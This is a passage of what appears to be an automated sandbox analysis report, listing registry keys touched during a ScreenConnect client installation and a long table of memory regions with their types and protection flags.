HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
Assignment
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
AdvertiseFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
ProductIcon
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
InstanceType
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
AuthorizedLUAApp
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
DeploymentFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
2716AF894534C98E91A6001A1A17F4D7
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7\SourceList
|
PackageName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7\SourceList\Net
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7\SourceList\Media
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7
|
Clients
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2716AF894534C98E91A6001A1A17F4D7\SourceList
|
LastUsedSource
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
|
StringCacheGeneration
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)
|
ImagePath
|
There are 89 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
43B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4110000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102E0000
|
trusted library allocation
|
page read and write
|
||
|
2718622B000
|
heap
|
page read and write
|
||
|
4220000
|
trusted library allocation
|
page read and write
|
||
|
42F0000
|
trusted library allocation
|
page read and write
|
||
|
2950000
|
trusted library allocation
|
page read and write
|
||
|
271861F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF7B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B05E000
|
stack
|
page read and write
|
||
|
1B423000
|
heap
|
page read and write
|
||
|
7D22000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10010000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1E9000
|
heap
|
page read and write
|
||
|
42AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B7000
|
heap
|
page read and write
|
||
|
7FFB101CA000
|
trusted library allocation
|
page read and write
|
||
|
1264E000
|
trusted library allocation
|
page read and write
|
||
|
41D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102DC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10520000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
trusted library section
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
FBD000
|
stack
|
page read and write
|
||
|
14BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
7FFB10580000
|
trusted library allocation
|
page read and write
|
||
|
3DBE000
|
stack
|
page read and write
|
||
|
1DF9000
|
trusted library allocation
|
page read and write
|
||
|
5DBE000
|
stack
|
page read and write
|
||
|
87C000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
7F350000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10000000
|
trusted library allocation
|
page read and write
|
||
|
1E8A000
|
trusted library allocation
|
page read and write
|
||
|
1B212000
|
heap
|
page read and write
|
||
|
7FFB10500000
|
trusted library allocation
|
page read and write
|
||
|
1B3E3000
|
heap
|
page read and write
|
||
|
7FFB10100000
|
trusted library allocation
|
page read and write
|
||
|
2AE3000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
165A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB102A8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10400000
|
trusted library allocation
|
page read and write
|
||
|
7BFA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102BA000
|
trusted library allocation
|
page read and write
|
||
|
1B062000
|
unkown
|
page readonly
|
||
|
4580000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101D5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102F8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10360000
|
trusted library allocation
|
page read and write
|
||
|
6F4D000
|
trusted library allocation
|
page read and write
|
||
|
1B392000
|
heap
|
page read and write
|
||
|
7FFB101B5000
|
trusted library allocation
|
page read and write
|
||
|
45B0000
|
trusted library allocation
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
7FFB10530000
|
trusted library allocation
|
page execute and read and write
|
||
|
41C0000
|
trusted library allocation
|
page read and write
|
||
|
5BAD000
|
stack
|
page read and write
|
||
|
45B4000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
1B340000
|
heap
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10540000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB101A5000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102AB000
|
trusted library allocation
|
page read and write
|
||
|
28FD000
|
trusted library allocation
|
page read and write
|
||
|
406F000
|
stack
|
page read and write
|
||
|
94D1000
|
trusted library allocation
|
page read and write
|
||
|
5BF4000
|
trusted library section
|
page read and write
|
||
|
1B1E1000
|
heap
|
page read and write
|
||
|
295A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10520000
|
trusted library allocation
|
page read and write
|
||
|
4209000
|
trusted library allocation
|
page read and write
|
||
|
FFE000
|
stack
|
page read and write
|
||
|
26EC000
|
heap
|
page read and write
|
||
|
7FFB10115000
|
trusted library allocation
|
page read and write
|
||
|
45CE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10290000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101B2000
|
trusted library allocation
|
page read and write
|
||
|
7BF4000
|
trusted library allocation
|
page read and write
|
||
|
59B9000
|
heap
|
page read and write
|
||
|
7FFB10105000
|
trusted library allocation
|
page read and write
|
||
|
1AFA0000
|
heap
|
page read and write
|
||
|
7FFB10020000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A71000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10006000
|
trusted library allocation
|
page read and write
|
||
|
1C5B5000
|
heap
|
page read and write
|
||
|
B3E000
|
stack
|
page read and write
|
||
|
7FFB10240000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF52000
|
trusted library allocation
|
page read and write
|
||
|
148C000
|
stack
|
page read and write
|
||
|
3281000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10280000
|
trusted library allocation
|
page read and write
|
||
|
1AF30000
|
heap
|
page read and write
|
||
|
7FF478290000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BB70000
|
heap
|
page execute and read and write
|
||
|
7FFB101E0000
|
trusted library allocation
|
page read and write
|
||
|
18F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10270000
|
trusted library allocation
|
page read and write
|
||
|
6A41000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
26D7000
|
heap
|
page read and write
|
||
|
7FFB0FF84000
|
trusted library allocation
|
page read and write
|
||
|
5AD8000
|
trusted library allocation
|
page read and write
|
||
|
1735000
|
heap
|
page read and write
|
||
|
6F47000
|
trusted library allocation
|
page read and write
|
||
|
6DE3000
|
trusted library allocation
|
page read and write
|
||
|
4240000
|
trusted library allocation
|
page read and write
|
||
|
1AF73000
|
trusted library allocation
|
page read and write
|
||
|
5C7E000
|
stack
|
page read and write
|
||
|
5BEC000
|
stack
|
page read and write
|
||
|
7FFB10405000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101E5000
|
trusted library allocation
|
page read and write
|
||
|
27186222000
|
heap
|
page read and write
|
||
|
201C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101AF000
|
trusted library allocation
|
page read and write
|
||
|
89C000
|
heap
|
page read and write
|
||
|
530D000
|
stack
|
page read and write
|
||
|
4540000
|
trusted library allocation
|
page read and write
|
||
|
6DDC000
|
trusted library allocation
|
page read and write
|
||
|
26EA000
|
heap
|
page read and write
|
||
|
43B0000
|
trusted library allocation
|
page read and write
|
||
|
1630000
|
trusted library allocation
|
page read and write
|
||
|
2832000
|
trusted library allocation
|
page read and write
|
||
|
52A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4162000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10510000
|
trusted library allocation
|
page read and write
|
||
|
16D4000
|
heap
|
page read and write
|
||
|
7FFB102D0000
|
trusted library allocation
|
page read and write
|
||
|
53AD000
|
stack
|
page read and write
|
||
|
4216000
|
trusted library allocation
|
page read and write
|
||
|
5B6E000
|
stack
|
page read and write
|
||
|
7FFB10550000
|
trusted library allocation
|
page read and write
|
||
|
4624000
|
trusted library allocation
|
page read and write
|
||
|
4381000
|
trusted library allocation
|
page read and write
|
||
|
4B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10335000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10198000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF7A000
|
trusted library allocation
|
page read and write
|
||
|
32A0000
|
heap
|
page execute and read and write
|
||
|
1B8FE000
|
stack
|
page read and write
|
||
|
7FFB0FF50000
|
trusted library allocation
|
page read and write
|
||
|
4490000
|
unkown
|
page readonly
|
||
|
5C30000
|
trusted library allocation
|
page read and write
|
||
|
458A000
|
trusted library allocation
|
page read and write
|
||
|
79B000
|
heap
|
page read and write
|
||
|
2775000
|
heap
|
page read and write
|
||
|
4380000
|
heap
|
page readonly
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10330000
|
trusted library allocation
|
page read and write
|
||
|
271861B0000
|
unclassified section
|
page readonly
|
||
|
7FFB104F0000
|
trusted library allocation
|
page read and write
|
||
|
1AA1A000
|
stack
|
page read and write
|
||
|
10BB000
|
heap
|
page read and write
|
||
|
7FFB1000C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1910000
|
trusted library allocation
|
page read and write
|
||
|
166E000
|
heap
|
page read and write
|
||
|
7FFB10178000
|
trusted library allocation
|
page read and write
|
||
|
4166000
|
trusted library allocation
|
page read and write
|
||
|
8CF000
|
heap
|
page read and write
|
||
|
1950000
|
heap
|
page read and write
|
||
|
1ABCD000
|
stack
|
page read and write
|
||
|
14CE000
|
stack
|
page read and write
|
||
|
1C90D000
|
stack
|
page read and write
|
||
|
1B074000
|
unkown
|
page readonly
|
||
|
1C21000
|
trusted library allocation
|
page read and write
|
||
|
F54BFFE000
|
unkown
|
page readonly
|
||
|
1AE0000
|
heap
|
page read and write
|
||
|
32B1000
|
trusted library allocation
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
5AEE000
|
stack
|
page read and write
|
||
|
623D000
|
stack
|
page read and write
|
||
|
F54BEFE000
|
stack
|
page read and write
|
||
|
7FFB102E8000
|
trusted library allocation
|
page read and write
|
||
|
1123000
|
trusted library allocation
|
page execute and read and write
|
||
|
18F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
15EE000
|
stack
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10325000
|
trusted library allocation
|
page read and write
|
||
|
41A9000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
327E000
|
trusted library allocation
|
page read and write
|
||
|
52BF000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10230000
|
trusted library allocation
|
page read and write
|
||
|
45D1000
|
trusted library allocation
|
page read and write
|
||
|
985000
|
heap
|
page read and write
|
||
|
7FFB102C7000
|
trusted library allocation
|
page read and write
|
||
|
4410000
|
unkown
|
page readonly
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
1D1D3000
|
heap
|
page read and write
|
||
|
14E0000
|
heap
|
page read and write
|
||
|
162D000
|
trusted library allocation
|
page execute and read and write
|
||
|
45A0000
|
trusted library allocation
|
page read and write
|
||
|
60FA000
|
stack
|
page read and write
|
||
|
4624000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104F0000
|
trusted library allocation
|
page read and write
|
||
|
5EC0000
|
heap
|
page read and write
|
||
|
7FFB101C9000
|
trusted library allocation
|
page read and write
|
||
|
4181000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10490000
|
trusted library allocation
|
page read and write
|
||
|
4BE0000
|
trusted library allocation
|
page read and write
|
||
|
1A40000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
238E000
|
stack
|
page read and write
|
||
|
6F55000
|
trusted library allocation
|
page read and write
|
||
|
4390000
|
trusted library allocation
|
page read and write
|
||
|
2FAE000
|
stack
|
page read and write
|
||
|
7FFB10390000
|
trusted library allocation
|
page read and write
|
||
|
18FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB0FF6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5330000
|
trusted library allocation
|
page read and write
|
||
|
1AF35000
|
heap
|
page read and write
|
||
|
7FFB103A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10120000
|
trusted library allocation
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
384000
|
unkown
|
page write copy
|
||
|
7FFB104C0000
|
trusted library allocation
|
page read and write
|
||
|
31CC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10188000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102A5000
|
trusted library allocation
|
page read and write
|
||
|
43C0000
|
trusted library allocation
|
page read and write
|
||
|
16A7000
|
heap
|
page read and write
|
||
|
41B0000
|
heap
|
page execute and read and write
|
||
|
166A000
|
heap
|
page read and write
|
||
|
1C5B0000
|
heap
|
page read and write
|
||
|
1C2F6000
|
stack
|
page read and write
|
||
|
46B000
|
stack
|
page read and write
|
||
|
7FFB104D0000
|
trusted library allocation
|
page read and write
|
||
|
1AF10000
|
heap
|
page execute and read and write
|
||
|
7FFB103E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF74000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10410000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1017C000
|
trusted library allocation
|
page read and write
|
||
|
462C000
|
trusted library allocation
|
page read and write
|
||
|
F3D000
|
unkown
|
page readonly
|
||
|
7FFB10370000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1022D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF63000
|
trusted library allocation
|
page read and write
|
||
|
12641000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10500000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10260000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10560000
|
trusted library allocation
|
page read and write
|
||
|
1B080000
|
heap
|
page execute and read and write
|
||
|
7FFB10340000
|
trusted library allocation
|
page read and write
|
||
|
23D0000
|
trusted library section
|
page read and write
|
||
|
5C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1275E000
|
trusted library allocation
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
7C9000
|
heap
|
page read and write
|
||
|
43E0000
|
heap
|
page read and write
|
||
|
386000
|
unkown
|
page readonly
|
||
|
482C000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
2C21000
|
trusted library allocation
|
page read and write
|
||
|
14C7000
|
heap
|
page read and write
|
||
|
7FFB102CC000
|
trusted library allocation
|
page read and write
|
||
|
1057000
|
heap
|
page read and write
|
||
|
7FFB104BD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103A7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10150000
|
trusted library allocation
|
page read and write
|
||
|
B00E000
|
stack
|
page read and write
|
||
|
FAE000
|
stack
|
page read and write
|
||
|
7FFB101C2000
|
trusted library allocation
|
page read and write
|
||
|
2641000
|
trusted library allocation
|
page read and write
|
||
|
225E000
|
stack
|
page read and write
|
||
|
5C20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103F3000
|
trusted library allocation
|
page read and write
|
||
|
4640000
|
heap
|
page execute and read and write
|
||
|
F54C5FE000
|
unkown
|
page readonly
|
||
|
1624000
|
trusted library allocation
|
page read and write
|
||
|
43D4000
|
trusted library allocation
|
page read and write
|
||
|
2630000
|
heap
|
page read and write
|
||
|
12691000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10300000
|
trusted library allocation
|
page read and write
|
||
|
1B310000
|
heap
|
page execute and read and write
|
||
|
1B2AE000
|
stack
|
page read and write
|
||
|
7FFB102B2000
|
trusted library allocation
|
page read and write
|
||
|
42B0000
|
trusted library allocation
|
page read and write
|
||
|
8AF000
|
unkown
|
page readonly
|
||
|
7FFB10140000
|
trusted library allocation
|
page read and write
|
||
|
1ACE000
|
stack
|
page read and write
|
||
|
45F0000
|
heap
|
page execute and read and write
|
||
|
5655000
|
trusted library allocation
|
page read and write
|
||
|
31C0000
|
trusted library allocation
|
page read and write
|
||
|
27186130000
|
unclassified section
|
page readonly
|
||
|
1138000
|
heap
|
page read and write
|
||
|
58F0000
|
trusted library section
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
7FFB1018C000
|
trusted library allocation
|
page read and write
|
||
|
FD7000
|
heap
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
27186256000
|
heap
|
page read and write
|
||
|
200C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10242000
|
trusted library allocation
|
page read and write
|
||
|
63E0000
|
heap
|
page read and write
|
||
|
7FFB10110000
|
trusted library allocation
|
page read and write
|
||
|
124A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF8B000
|
trusted library allocation
|
page execute and read and write
|
||
|
14C0000
|
heap
|
page read and write
|
||
|
7FFB1018C000
|
trusted library allocation
|
page read and write
|
||
|
42A4000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1001C000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B3000
|
heap
|
page read and write
|
||
|
5AA0000
|
trusted library allocation
|
page read and write
|
||
|
4000000
|
heap
|
page read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
5AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB102A0000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
heap
|
page read and write
|
||
|
5B10000
|
trusted library allocation
|
page read and write
|
||
|
1B0F2000
|
unkown
|
page readonly
|
||
|
1D1D6000
|
heap
|
page read and write
|
||
|
7FFB101BD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10530000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
44AE000
|
stack
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
5EBD000
|
stack
|
page read and write
|
||
|
31EB000
|
trusted library allocation
|
page read and write
|
||
|
14A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10232000
|
trusted library allocation
|
page read and write
|
||
|
3240000
|
trusted library section
|
page read and write
|
||
|
7FFB10297000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10311000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF62000
|
trusted library allocation
|
page read and write
|
||
|
2610000
|
heap
|
page read and write
|
||
|
7FFB10320000
|
trusted library allocation
|
page read and write
|
||
|
5BED000
|
stack
|
page read and write
|
||
|
1AE5E000
|
stack
|
page read and write
|
||
|
F54C3FE000
|
unkown
|
page readonly
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
914000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
F54C4FE000
|
stack
|
page read and write
|
||
|
4190000
|
heap
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
EFD000
|
stack
|
page read and write
|
||
|
7EBE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10145000
|
trusted library allocation
|
page read and write
|
||
|
1C6C0000
|
heap
|
page read and write
|
||
|
1C3F7000
|
stack
|
page read and write
|
||
|
ADED000
|
heap
|
page read and write
|
||
|
42A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F49000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
2480000
|
heap
|
page execute and read and write
|
||
|
26F7000
|
heap
|
page read and write
|
||
|
7FFB102CD000
|
trusted library allocation
|
page read and write
|
||
|
4510000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10280000
|
trusted library allocation
|
page read and write
|
||
|
7FFB100F0000
|
trusted library allocation
|
page read and write
|
||
|
42DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB0FF63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB101D9000
|
trusted library allocation
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
1B408000
|
heap
|
page read and write
|
||
|
4B90000
|
trusted library allocation
|
page read and write
|
||
|
14B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C27000
|
trusted library allocation
|
page read and write
|
||
|
14A0000
|
trusted library allocation
|
page read and write
|
||
|
42A1000
|
heap
|
page read and write
|
||
|
1CE3000
|
trusted library allocation
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
1BF0000
|
trusted library allocation
|
page read and write
|
||
|
42E0000
|
trusted library allocation
|
page read and write
|
||
|
1623000
|
trusted library allocation
|
page execute and read and write
|
||
|
2944000
|
trusted library allocation
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
7FFB1019C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10108000
|
trusted library allocation
|
page read and write
|
||
|
4195000
|
trusted library allocation
|
page read and write
|
||
|
442D000
|
stack
|
page read and write
|
||
|
7FFB10510000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102C2000
|
trusted library allocation
|
page read and write
|
||
|
4651000
|
trusted library allocation
|
page read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
12491000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FFAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
27186120000
|
heap
|
page read and write
|
||
|
ADCF000
|
stack
|
page read and write
|
||
|
1106000
|
heap
|
page read and write
|
||
|
7FFB101D0000
|
trusted library allocation
|
page read and write
|
||
|
2410000
|
unkown
|
page readonly
|
||
|
7CB000
|
heap
|
page read and write
|
||
|
1660000
|
heap
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
1AF5E000
|
stack
|
page read and write
|
||
|
1B4B3000
|
trusted library section
|
page read and write
|
||
|
7FFB10016000
|
trusted library allocation
|
page read and write
|
||
|
613E000
|
stack
|
page read and write
|
||
|
2640000
|
heap
|
page read and write
|
||
|
7FFB103E0000
|
trusted library allocation
|
page read and write
|
||
|
1136000
|
heap
|
page read and write
|
||
|
7FFB102B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10570000
|
trusted library allocation
|
page read and write
|
||
|
271861C0000
|
heap
|
page read and write
|
||
|
41A0000
|
heap
|
page read and write
|
||
|
7FFB101AC000
|
trusted library allocation
|
page read and write
|
||
|
1B3FD000
|
heap
|
page read and write
|
||
|
42D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF73000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF64000
|
trusted library allocation
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BD000
|
heap
|
page read and write
|
||
|
58EF000
|
stack
|
page read and write
|
||
|
93E000
|
heap
|
page read and write
|
||
|
3090000
|
trusted library section
|
page read and write
|
||
|
27186213000
|
heap
|
page read and write
|
||
|
5DAC000
|
trusted library section
|
page read and write
|
||
|
1EB0000
|
trusted library allocation
|
page read and write
|
||
|
163D000
|
trusted library allocation
|
page execute and read and write
|
||
|
448E000
|
stack
|
page read and write
|
||
|
ADD0000
|
heap
|
page read and write
|
||
|
27186302000
|
heap
|
page read and write
|
||
|
15C8000
|
stack
|
page read and write
|
||
|
3B0000
|
unkown
|
page readonly
|
||
|
42E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10220000
|
trusted library allocation
|
page read and write
|
||
|
42F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
59DC000
|
heap
|
page read and write
|
||
|
101B000
|
heap
|
page read and write
|
||
|
42D7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10319000
|
trusted library allocation
|
page read and write
|
||
|
788000
|
unkown
|
page readonly
|
||
|
7FFB103A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10260000
|
trusted library allocation
|
page read and write
|
||
|
437F000
|
stack
|
page read and write
|
||
|
F54BCFD000
|
stack
|
page read and write
|
||
|
6DCD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104E0000
|
trusted library allocation
|
page read and write
|
||
|
1656000
|
trusted library allocation
|
page execute and read and write
|
||
|
14B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1019F000
|
trusted library allocation
|
page read and write
|
||
|
18F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4150000
|
trusted library allocation
|
page read and write
|
||
|
B4C000
|
heap
|
page read and write
|
||
|
529E000
|
stack
|
page read and write
|
||
|
7FFB102E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF60000
|
trusted library allocation
|
page read and write
|
||
|
27186202000
|
heap
|
page read and write
|
||
|
37D000
|
unkown
|
page readonly
|
||
|
16A4000
|
heap
|
page read and write
|
||
|
41A3000
|
heap
|
page read and write
|
||
|
1620000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10110000
|
trusted library allocation
|
page read and write
|
||
|
5AF0000
|
trusted library allocation
|
page read and write
|
||
|
5310000
|
trusted library allocation
|
page read and write
|
||
|
6DD5000
|
trusted library allocation
|
page read and write
|
||
|
5B20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF54000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
1BAB8000
|
stack
|
page read and write
|
||
|
41A1000
|
heap
|
page read and write
|
||
|
1B060000
|
unkown
|
page readonly
|
||
|
1BEE000
|
stack
|
page read and write
|
||
|
1C910000
|
heap
|
page read and write
|
||
|
7FFB101AC000
|
trusted library allocation
|
page read and write
|
||
|
4370000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D7B000
|
stack
|
page read and write
|
||
|
7FFB104A0000
|
trusted library allocation
|
page read and write
|
||
|
439B000
|
trusted library allocation
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
1E8E000
|
trusted library allocation
|
page read and write
|
||
|
586B000
|
stack
|
page read and write
|
||
|
44EE000
|
stack
|
page read and write
|
||
|
2976000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10370000
|
trusted library allocation
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
B60000
|
trusted library allocation
|
page read and write
|
||
|
2686000
|
heap
|
page read and write
|
||
|
7DF000
|
heap
|
page read and write
|
||
|
B30000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10321000
|
trusted library allocation
|
page read and write
|
||
|
3B2000
|
unkown
|
page readonly
|
||
|
45B6000
|
trusted library allocation
|
page read and write
|
||
|
F2C000
|
stack
|
page read and write
|
||
|
7FFB0FF53000
|
trusted library allocation
|
page execute and read and write
|
||
|
4635000
|
trusted library allocation
|
page read and write
|
||
|
4140000
|
trusted library allocation
|
page read and write
|
||
|
1650000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FFBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
6380000
|
heap
|
page read and write
|
||
|
125BE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10560000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10155000
|
trusted library allocation
|
page read and write
|
||
|
F31000
|
unkown
|
page execute read
